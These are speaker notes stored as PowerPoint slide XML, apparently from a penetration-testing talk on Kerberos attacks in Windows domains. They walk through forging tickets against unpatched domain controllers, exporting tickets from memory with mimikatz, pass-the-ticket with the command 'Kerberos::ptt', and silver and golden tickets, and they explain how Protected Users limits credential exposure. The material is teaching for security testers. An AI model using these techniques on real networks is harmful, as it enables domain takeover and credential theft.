                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> which could be used to exploit this issue with some help from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, however now there is a Metasploit module which exports an MIT Kerberos Credential Cache file which you can use on Linux, or convert using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> for Windows. Be warned that these tools always seem to respond positively even if the DC has been patched. Best off just trying it against each domain controller and hoping they haven’t patched in 4 years….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" b="0" i="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1566339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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> you have to go through a few setup steps before you can use the forged ticket you created with Metasploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install the dependency, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>confiure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the realm to match the domain name and domain controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Initialise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a ticket with you user creds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy the file that Metasploit created you over the top of your actual ticket. Note that the zero on the end of that filename is you user id on your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> system, zero being root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can then open a session to the domain controller using your forged ticket, since the ticket says you are in the domain admins group.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows is already setup to use Kerberos so you can import the ticket using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and then use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to open a command prompt on the domain controller.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3713853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traditionally there?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Why less so now (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> patch back ported)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>protected user groups (impact on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> ticket life) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logging on interactively leaves your credentials in memory, this applies if you login directly to the computer or over RDP. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apparently just logging off should clear them from memory, but they can be left orphaned, so the only way to be sure is to nuke them from orbit by rebooting the machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows 8 and later wipe the plaintext password from memory there was also an update to backport this behavior – but it has to be enabled.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You’ll probably have noticed this on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> if you have been using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, plaintext creds are just a bit harder to come by than they used to be.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you can fiddle with the registry and entice a user to login again, but I’m not a fan of messing with the registry I’m always just a bit to worried it will all go horrendously wrong and I’ll get kicked offsite for taking down their critical systems….and besides there is no guarantee that the same highly privileged user that we are targeting will login again…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft has also introduced the “Protected Users” group in Windows Server 2012 R2. Users in this group can’t use NTLM, digest authentication or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CredSSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – making it even more unlikely that their credentials will be hanging around in memory. Also the TTL for the TGT is reduced from 10hours to 4 hours, and DES / RC4 keys will not be used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So basically on modern systems you are much less likely to get plaintext creds or NTLM hashes from memory anymore, particularly if the Protected User group is in use.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1856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ABF0CB6-CA87-43EF-BAE7-95DD7F5EBC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1918424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like all techniques for recovering credentials from memory we need administrator permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First off create clean directory to work in.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mimkatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is still the best tool for the job, run the correct version (32/64bit) and enter the command to enable debug privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can list all of the tickets and then export them in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kirbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> format.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> This is going to export all of the Kerberos tickets currently on the system, and there can be LOTS of them, hence setting up the clean directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The tickets that we really want are the TGT for the user these have got </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krgtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and the domain name in the output filename.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Depending on if we are going to be abusing these tickets in Windows or Linux we might need to convert them. If you are on Windows then you can just take the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kirbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file, if you are on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> then you’ll need to convert the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kirbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ccache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> format. You don’t need to do this conversion on the system that you found them on, any Windows system will do.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1438173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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1456662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Kerberos is the default authentication on windows, so if you use the password you recover to login to a system you are going to be creating a Kerberos ticket to authenticate… but you already have the Kerberos ticket!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You have everything you need so no need to heat up the planet with your password cracking rig. You can just use the ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2431556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constraint of this is that the ticket has to be relatively fresh when you find it. Remember I said by default it has to be renewed every 10 hours, and every 4 hours for users in the Protected Users group, but did I mention that that renew is handled automatically by Windows up to that maximum renewal lifetime of 7 days?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So provided you haven’t recovered the ticket from an offline source, like a backup or something, you can just import the ticket into your keychain and use it, once its imported.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So how do we actually do this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Well on Windows its relatively simple with the help of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, because as I’ve said before, Kerberos is already configured and running we just need to load the ticket in.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can do this on any windows system in any session, you don’t need to be joined to the domain – your windows VM will work fine, you don’t need to be running from a command prompt, standard user will do:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ptt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tgt_filename.kirbi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That’s it, you can then exit out of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>builtin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>klist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> windows command to check your stolen ticket is in the list, and then use it to open a command prompt on the domain controller using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Best to remember thought that this won’t work if you specify the remote host by IP address, you have to use the fully qualified domain name of the host or the ticket won’t be used. And make sure your time is synchronized to the domain controller – if you are more than 5 minutes out you might get an error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2862610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should look pretty familiar if you were paying attention earlier – setup Kerberos tools on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, configure the realm, copy the ticket to the temporary file which the Kerberos service uses (remembering that last digit is your user id)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can now use any tool that supports Kerberos authentication, for example secretsdump.py</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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3171907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going to spend any time on this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overpass the hash is simply using the user’s NTLM hash to create a Kerberos ticket.. You can only do it if RC4 hasn’t been disabled. And frankly I don’t really see the point.</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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2814521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Silver Ticket is a forged Ticket Granting Service Ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unlike the normal authentication there is absolutely no interaction with the domain controller, unless the service is configured to perform PAC validation (which is apparently rare) and there is to Ticket Granting Ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to forge the TGS ticket you have to have the service’s long term key – or more accurately the key of the account the service is configured to run as, the one with the Service Principle Name. An current tools seem to need this to be the NTLM hash so that RC4 can be used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The good thing about this attack is that you get whatever privileges you ask for within the context of the service. You group membership is held within the ticket, and so long as the service can decrypt it, it trusts that it has come from the KDC. So you can just configure the ticket to state you are a member of the domain admins group, and just like that you have domain admin privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But bear in mind its only for that one service, and because you don’t have a ticket granting ticket you can’t access other services automatically, you need to make a forged TGS ticket for each service you want to interact with.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For actual attackers and red teaming that requires persistence, this can be a powerful and relatively stealth technique. If you have managed to get hold of the computer account password hash, you can use it to forge silver tickets for computer services such as CIFS and HOST, you can access the filesystem and execute commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> I don’t think this technique is going to be particularly helpful – but you never know what password hashes you are going to find hanging around in backups… so once in a blue moon it might be worth it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="462817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what I’ve seen the current tools require the NTLM hash in order to use RC4 to forge a ticket. Technically I imagine this could be done with AES keys as well if you have the account password, but at the minute the tool support doesn’t seem to be there, so it would raise the barrier to entry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1955486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golden ticket is another type of forged Kerberos ticket. This type we are forging a valid Ticket Granting Service Ticket. As you can see on the diagram the initial requests to validate the user are no longer required. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to forge the ticket we need to have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Kerberos account) key. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the Kerberos account hash, we can create a ticket for our user that states we are a member of the domain admins group, and that the ticket is valid for 10 years. Since the KDC can decrypt the ticket, it trusts that it (or another KDC) created the ticket, and grants access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Therefore like the silver attack its only rarely going to be of use during a normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However I have personally used this technique to compromise a domain – I found an old backup of a domain controller on a network share, every domain admin had since changed their password, but the Kerberos account hadn’t been changed, so I was able to create a golden ticket. It’s a good trick to keep in mind.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89C78E0C-20BC-CB4A-8DE6-877C7644BEFE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378867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primer for Kerberos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Its an authentication protocol that came out of MIT and is name after the three headed dog Cerberus in Greek mythology. That name is apt because there are 3 parties in Kerberos authentication: the client who wants to authenticate, the resource server that the client wants to authenticate to, and a 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> party the key distribution center who both the client and server trust.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Kerberos has built in security features such as encryption, antireplay, and optionally mutual authentication. Its also designed to run over an untrusted network – hence my little avatar in the middle of the network.</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key distribution center is on the Windows domain controller (in the top right), the client user on their workstation on the left, the resource server (in the bottom right)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The authentication is all within a Kerberos realms, which in Windows is the Domains. One important point is that the you need to use the DNS style domain name for Kerberos, not the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netbios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
